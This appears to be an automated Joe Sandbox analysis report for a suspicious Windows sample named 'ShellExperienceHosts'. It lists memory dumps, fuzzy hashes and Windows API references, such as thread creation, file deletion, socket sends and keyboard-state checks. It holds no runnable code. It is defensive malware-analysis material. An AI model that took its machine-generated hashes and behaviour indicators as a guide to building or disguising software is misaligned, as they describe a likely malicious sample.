Associated: 00000003.00000002.3535884612.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535927057.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535947113.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535967860.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535987425.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: aaf3e0f0d0f8f1f3a4ac2f5b8bd5fab41d3eaa100fa15abfee4d2d644b7fd40f
Instruction ID: 723c430d69d621f95a846468934f8435ff5600678504d51602c72318876ab3a6
Opcode Fuzzy Hash: aaf3e0f0d0f8f1f3a4ac2f5b8bd5fab41d3eaa100fa15abfee4d2d644b7fd40f
Instruction Fuzzy Hash: B9D012B8104910C7E310DB50C4C465EB2E1FF58300F30C519E92D8B615C738F8C18652

Function 10004274 Relevance: 1.5, APIs: 1, Instructions: 11threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,Function_00006110,00000000), ref: 10020693

Memory Dump Source

Source File: 00000003.00000002.3535904141.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3535884612.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535927057.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535947113.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535967860.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535987425.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 13c8da13fabdb43a0039df29cdbc36604e7b86c2d4870efbc9606bf7f6935c8f
Instruction ID: caee183b5a6c68c45fee89ce5ab94ef9cb690e012967d693a85690ee7ea4d081
Opcode Fuzzy Hash: 13c8da13fabdb43a0039df29cdbc36604e7b86c2d4870efbc9606bf7f6935c8f
Instruction Fuzzy Hash: 20C04C3424C314E9F430D1442C46B5C1401F75EB65EB543177B205E4D74D7040C13553

Function 6C9C7A3C Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 6C9C7A4B

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: DeleteObject
String ID:
API String ID: 1531683806-0
Opcode ID: caf835ab5cbdfc84a3e865b7d6460e349468168f5bbd8b3c820e8c57c73689dc
Instruction ID: 4a4b53198247352b3e27d6111a87c50c708e307cce59bd3ee40d85f50d594332
Opcode Fuzzy Hash: caf835ab5cbdfc84a3e865b7d6460e349468168f5bbd8b3c820e8c57c73689dc
Instruction Fuzzy Hash: B2B01270B05101BFDF409730850C31B35786F5130EF54A9A4F005C3404DB3EC105D513

Function 6C9AE9E0 Relevance: 1.5, APIs: 1, Instructions: 5fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000,6C9B00B6,?,?,65776F70), ref: 6C9AE9E1

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 59d89fa08356afec95b6e73c9ee1e009fc18eb40e1c0c8b9fb0f1ac7a62afede
Instruction ID: 8945c7e551ed3648c15f7aab11405ba095e30e2e37fb096bb0a7a6b3d6793d6d
Opcode Fuzzy Hash: 59d89fa08356afec95b6e73c9ee1e009fc18eb40e1c0c8b9fb0f1ac7a62afede
Instruction Fuzzy Hash: 4FA00264312241C79B241B315A0960E257D7D429D5F0585586455C7050DA29C5515511

Function 1001F63D Relevance: 1.5, APIs: 1, Instructions: 3networkCOMMON

Download Yara Rule

APIs

send.WS2_32 ref: 1001F63D

Memory Dump Source

Source File: 00000003.00000002.3535967860.000000001001F000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3535884612.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535904141.0000000010001000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535927057.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535947113.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535987425.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: b133ea7d05f53c3c11ad6334d0588478f261473ccb87b5617e28918120fa56af
Instruction ID: 6b957aef4a72e5dc30e8cb3213a85d60c43ac51bc1e09057d618b7ba0e2fc2ae
Opcode Fuzzy Hash: b133ea7d05f53c3c11ad6334d0588478f261473ccb87b5617e28918120fa56af
Instruction Fuzzy Hash: 8D900238288511FAA2124A2158897593654D6145423185418DC02C9010D631C2806514

Function 10005EB2 Relevance: 1.3, APIs: 1, Instructions: 15sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 10005EB2

Part of subcall function 10006F17: _malloc.LIBCMT ref: 10006F31

Memory Dump Source

Source File: 00000003.00000002.3535904141.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3535884612.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535927057.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535947113.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535967860.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535987425.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd

Similarity

API ID: Sleep_malloc
String ID:
API String ID: 617756273-0
Opcode ID: bd1a2801bd1f1b37b244e82fcf0364694be79379b717d5536a6d8ec7b8dccb93
Instruction ID: c703cf204976232012e29921027dce2d5ea17eb50e6b597cbfa29dc34b4da51f
Opcode Fuzzy Hash: bd1a2801bd1f1b37b244e82fcf0364694be79379b717d5536a6d8ec7b8dccb93
Instruction Fuzzy Hash: 6CD0A772D08202CBE7B0EDD048C403D6052A758284F74803DD6059D001D5718D849382

Function 6C9B2A10 Relevance: 1.3, APIs: 1, Instructions: 4sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00011D28), ref: 6C9B2A15

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 844da0b61e8d15e890c1df7c7e6ba396849ecb2f90d0ce515a1ff5ceeae92b64
Instruction ID: 2739b08e1e2ede13b8d71536b9361b50b300ab4270c80fad6c7eb62836ab5502
Opcode Fuzzy Hash: 844da0b61e8d15e890c1df7c7e6ba396849ecb2f90d0ce515a1ff5ceeae92b64
Instruction Fuzzy Hash: 92A002717511444657145774B94ED8A75F85FF97027418431B319CB445DA7441509526

Function 004A152F Relevance: 1.0, Instructions: 1003COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3534486223.000000000049F000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3534205599.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.3534245326.0000000000401000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.3534288043.000000000040C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.3534288043.0000000000414000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.3534288043.0000000000456000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ShellExperienceHosts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eda3440530c695fabe89684c08ced21f14d361cbd0f309897fafc30276024117
Instruction ID: 43da5d217c0980cd259a2d2a29eecca7fa398e6e45ce52ccb5a58d6b0a96cd39
Opcode Fuzzy Hash: eda3440530c695fabe89684c08ced21f14d361cbd0f309897fafc30276024117
Instruction Fuzzy Hash:

Non-executed Functions

Function 6C9CA729 Relevance: 44.3, APIs: 24, Strings: 1, Instructions: 584windowCOMMON

Download Yara Rule

APIs

IsRectEmpty.USER32(?), ref: 6C9CA762
GetClientRect.USER32(?,?), ref: 6C9CA7AD
BeginDeferWindowPos.USER32(?), ref: 6C9CA7D8
GetWindowRect.USER32(?,?), ref: 6C9CA8BE
OffsetRect.USER32(?,?,00000000), ref: 6C9CA8F5
OffsetRect.USER32(?,?,00000000), ref: 6C9CA92B
OffsetRect.USER32(?,00000002,00000000), ref: 6C9CA955
EqualRect.USER32(?,?), ref: 6C9CA963
OffsetRect.USER32(?,00000000,?), ref: 6C9CAA30
OffsetRect.USER32(?,00000000,00000002), ref: 6C9CAA68
OffsetRect.USER32(?,00000000,00000002), ref: 6C9CAA8E
EqualRect.USER32(?,?), ref: 6C9CAAC5
EndDeferWindowPos.USER32(00000000), ref: 6C9CABDB
SetRectEmpty.USER32(?), ref: 6C9CABEC
SetRectEmpty.USER32(?), ref: 6C9CAC9B
__EH_prolog3.LIBCMT ref: 6C9CACD9
GetSystemMenu.USER32(?,00000000,00000000,00000000,6CB316B0,?,6CB86054), ref: 6C9CAD4A
DeleteMenu.USER32(?,0000F000,00000000,00000000), ref: 6C9CAD6D
DeleteMenu.USER32(?,0000F020,00000000), ref: 6C9CAD7D
DeleteMenu.USER32(?,0000F030,00000000), ref: 6C9CAD8D
DeleteMenu.USER32(?,0000F120,00000000), ref: 6C9CAD9D
DeleteMenu.USER32(?,0000F060,00000000,0000F011), ref: 6C9CADD0
AppendMenuW.USER32(?,00000000,0000F060,?), ref: 6C9CADE4
SetParent.USER32(?,?), ref: 6C9CAE31

Strings

AfxControlBar140su, xrefs: 6C9CACB2

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Rect$Menu$Offset$Delete$EmptyWindow$DeferEqual$AppendBeginClientH_prolog3ParentSystem
String ID: AfxControlBar140su
API String ID: 3719053429-1200545664
Opcode ID: e5a7c98f098fa828759a8e29d3623f3a5169fb61d17e4ee0b33c049382f0346f
Instruction ID: c1260e62e29ff8e7f2b27b375d049569847fd8d3d9c638d68f0634715026e291
Opcode Fuzzy Hash: e5a7c98f098fa828759a8e29d3623f3a5169fb61d17e4ee0b33c049382f0346f
Instruction Fuzzy Hash: D3325C71B01209DFDF04CFA4C984BAEBBB9FF59304F144169E909AB640DB70E945CB62

Function 6C9EA428 Relevance: 35.1, APIs: 23, Instructions: 607windowCOMMON

Download Yara Rule

APIs

Part of subcall function 6CA4264C: ReleaseCapture.USER32 ref: 6CA42683
Part of subcall function 6CA4264C: IsWindow.USER32(?), ref: 6CA426B2
Part of subcall function 6CA4264C: DestroyWindow.USER32(?), ref: 6CA426C2

SetRectEmpty.USER32(?), ref: 6C9EA453
ReleaseCapture.USER32 ref: 6C9EA459
SetCapture.USER32(?), ref: 6C9EA46C
GetCapture.USER32 ref: 6C9EA4AB
ReleaseCapture.USER32 ref: 6C9EA4BB
SetCapture.USER32(?), ref: 6C9EA4CE
RedrawWindow.USER32(?,00000000,00000000,00000505), ref: 6C9EA56C
GetFocus.USER32 ref: 6C9EA5F9
NotifyWinEvent.USER32(00008005,?,000000FC,00000000), ref: 6C9EA62D
InvalidateRect.USER32(?,?,00000001,?), ref: 6C9EA7FF
InflateRect.USER32(?,00000000,?), ref: 6C9EA845
RedrawWindow.USER32(?,?,00000000,00000401), ref: 6C9EA858
InvalidateRect.USER32(?,?,00000001,?), ref: 6C9EA8EB
InflateRect.USER32(?,00000000,?), ref: 6C9EA931
RedrawWindow.USER32(?,?,00000000,00000401), ref: 6C9EA945
NotifyWinEvent.USER32(00008005,?,000000FC,00000001), ref: 6C9EAA2B
InvalidateRect.USER32(?,?,00000001,?,?,?), ref: 6C9EAA9C
InflateRect.USER32(?,00000000,?), ref: 6C9EAAE2
RedrawWindow.USER32(?,?,00000000,00000401,?,?), ref: 6C9EAAF5
InvalidateRect.USER32(?,?,00000001,?,?,?), ref: 6C9EAB67
InflateRect.USER32(?,00000000,?), ref: 6C9EABAD
RedrawWindow.USER32(?,?,00000000,00000401,?,?), ref: 6C9EABC0
UpdateWindow.USER32(?), ref: 6C9EABC9

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Rect$Window$Capture$Redraw$InflateInvalidate$Release$EventNotify$DestroyEmptyFocusUpdate
String ID:
API String ID: 985404702-0
Opcode ID: ccf3bc59559f028a0affbf8b04885d4186b30091b224a202fe8e8b1cf723217d
Instruction ID: 5c844e7ac832f394a69a71b3172e849e7fa30bf0b30b3466928b0ca07df1f512
Opcode Fuzzy Hash: ccf3bc59559f028a0affbf8b04885d4186b30091b224a202fe8e8b1cf723217d
Instruction Fuzzy Hash: 3732C331B01616EFDF1ACF64C984AADBBB9FF69714F114259E815A7A60DF30E801CB90

Function 6C9D6027 Relevance: 22.7, APIs: 15, Instructions: 181COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00003020), ref: 6C9D604F
GetDlgItem.USER32(?,00003020), ref: 6C9D607A
GetWindowRect.USER32(00000000,?), ref: 6C9D608E
MapDialogRect.USER32(?,?), ref: 6C9D60B1
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000016), ref: 6C9D60DB
GetDlgItem.USER32(?,00000001), ref: 6C9D60EC
GetWindowRect.USER32(00000000,?), ref: 6C9D60FE
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000015,?), ref: 6C9D6122
GetWindowRect.USER32(?,?), ref: 6C9D6137
GetWindowRect.USER32(?,?), ref: 6C9D6195
GetDlgItem.USER32(?,00000001), ref: 6C9D61A7
GetWindowRect.USER32(00000000,?), ref: 6C9D61B6
GetDlgItem.USER32(?,00000001), ref: 6C9D61DF
ShowWindow.USER32(00000000,00000000), ref: 6C9D61EE
EnableWindow.USER32(00000000,00000000), ref: 6C9D61F7

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Window$Rect$Item$DialogEnableShow
String ID:
API String ID: 763981185-0
Opcode ID: f1d84574334810b6479397d0d512273ca18c234b79ccc31f8246ae12e2900e05
Instruction ID: 869b2539b89781467b21f3e391a5a28db9e5aa96b454678e5a85f124cdd7bc37
Opcode Fuzzy Hash: f1d84574334810b6479397d0d512273ca18c234b79ccc31f8246ae12e2900e05
Instruction Fuzzy Hash: CE514971A00649AFEB20CFB5CD88AAFBBBDFF59704F114518F94AF2551DA31A940CB60

Function 6C9EC589 Relevance: 21.3, APIs: 14, Instructions: 309windowCOMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 6C9EC61E
RedrawWindow.USER32(?,00000000,00000000,00000505,?,?), ref: 6C9EC63C
ReleaseCapture.USER32 ref: 6C9EC642
SetCapture.USER32(?,?,?), ref: 6C9EC655
ReleaseCapture.USER32 ref: 6C9EC6E2
SetCapture.USER32(?), ref: 6C9EC6F5
SendMessageW.USER32(?,00000362,0000E001,00000000), ref: 6C9EC7E9
UpdateWindow.USER32(?), ref: 6C9EC875
SendMessageW.USER32(?,00000111,00000000,00000000), ref: 6C9EC8C4
IsWindow.USER32(?), ref: 6C9EC8D0
IsIconic.USER32(?), ref: 6C9EC8DB
IsZoomed.USER32(?), ref: 6C9EC8E6
IsWindow.USER32(?), ref: 6C9EC904
UpdateWindow.USER32(?), ref: 6C9EC960

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Window$Capture$MessageReleaseSendUpdate$EmptyIconicRectRedrawZoomed
String ID:
API String ID: 2500574155-0
Opcode ID: bf0e50d46a5adb107944f9601622f9bef34e649c6ba011aa93e23d75505d1582
Instruction ID: c8890a0a3555509259417345a7128088818db5b06a9c16f197b9f729e18655dc
Opcode Fuzzy Hash: bf0e50d46a5adb107944f9601622f9bef34e649c6ba011aa93e23d75505d1582
Instruction Fuzzy Hash: 6AC18D35700655AFCF06AF64C888AAD3FB9BF59714F1402AAEC5AAB691CB31D900CB50

Function 6C9F3C60 Relevance: 15.5, APIs: 10, Instructions: 502keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000010), ref: 6C9F3CBA
IsRectEmpty.USER32(?), ref: 6C9F3FD1
IsRectEmpty.USER32(?), ref: 6C9F40B9
SendMessageW.USER32(?,00000362,0000E001,00000000), ref: 6C9F41FA

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: EmptyRect$MessageSendState
String ID:
API String ID: 913422142-0
Opcode ID: 70b61be94093e1f6286571602d97406541c01dfefa92c475eab633ee55eb2f17
Instruction ID: 8372521c4106f0ff20e64e693e8f40722a14d6ab18b3f677d6e10b24e50ee8c9
Opcode Fuzzy Hash: 70b61be94093e1f6286571602d97406541c01dfefa92c475eab633ee55eb2f17
Instruction Fuzzy Hash: 92128C31A012199BEF01CF64D994BDD7BB9FF59318F24417AE825AB690DB30D846CFA0

Function 6C9D677C Relevance: 13.6, APIs: 9, Instructions: 77windowkeyboardCOMMON

Download Yara Rule

APIs

GetPropW.USER32(?,?), ref: 6C9D679A
GlobalLock.KERNEL32(00000000), ref: 6C9D67A7
SendMessageW.USER32(?,00000476,00000000,00000000), ref: 6C9D67C2
GlobalUnlock.KERNEL32(00000000), ref: 6C9D67CD
RemovePropW.USER32(?), ref: 6C9D67DC
GlobalFree.KERNEL32(00000000), ref: 6C9D67E7
GlobalUnlock.KERNEL32(00000000), ref: 6C9D6809
GetAsyncKeyState.USER32(00000011), ref: 6C9D681A
SendMessageW.USER32(?,00000475,00000000,?), ref: 6C9D6842

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Global$MessagePropSendUnlock$AsyncFreeLockRemoveState
String ID:
API String ID: 723318029-0
Opcode ID: 8cb7579037b63cf52df60a17efe76d5493b280dfe5e4990821e960292858577c
Instruction ID: ce572a857a913fe59455db94f344fd81b673ba2864d3f089dae7a786cb188b7f
Opcode Fuzzy Hash: 8cb7579037b63cf52df60a17efe76d5493b280dfe5e4990821e960292858577c
Instruction Fuzzy Hash: 6721CA32305B46ABEB201F62DC88B1A3A7DFF5A709F118969E54AF3950DB71F480CB50

Function 6C9CAE7F Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 6C9CAECD
EqualRect.USER32(?,00000000), ref: 6C9CAEEB

Part of subcall function 6C9BE7EE: SetWindowPos.USER32(?,?,?,3E6EA3C2,6C9BEBAD,?,6C9BF24C,00000000,?,6C9C23ED,00000000,00000000,00000000,00000000,00000000,00000097), ref: 6C9BE816

IsWindowVisible.USER32(?), ref: 6C9CAFA6
CopyRect.USER32(?,?), ref: 6C9CAFE6
GetParent.USER32(?), ref: 6C9CB0C8
SetParent.USER32(?,?), ref: 6C9CB0DE

Strings

4(@P, xrefs: 6C9CB132

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: RectWindow$Parent$CopyEqualVisible
String ID: 4(@P
API String ID: 3103310903-4081170755
Opcode ID: 4e3d98b3cad2088c8f563796259e72cc55ac8d2df9e7b5c85918a6780a1ede48
Instruction ID: 86fe68187790116479e63a3d11c4c91dfca437abb426fe17404f2bcebda61550
Opcode Fuzzy Hash: 4e3d98b3cad2088c8f563796259e72cc55ac8d2df9e7b5c85918a6780a1ede48
Instruction Fuzzy Hash: 1A81B471741619ABDF149F34CC89BEAB779FF14308F1002A9E919A7690CB34DA448B62

Function 6C9DCCD9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 189keyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 6C9B97AD: GetParent.USER32(?), ref: 6C9B97B7

ScreenToClient.USER32(?,?), ref: 6C9DCD66
GetKeyState.USER32(00000001), ref: 6C9DCDD7
GetKeyState.USER32(00000001), ref: 6C9DCE32
IsWindow.USER32(?), ref: 6C9DCEF3

Strings

0, xrefs: 6C9DCD7E

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

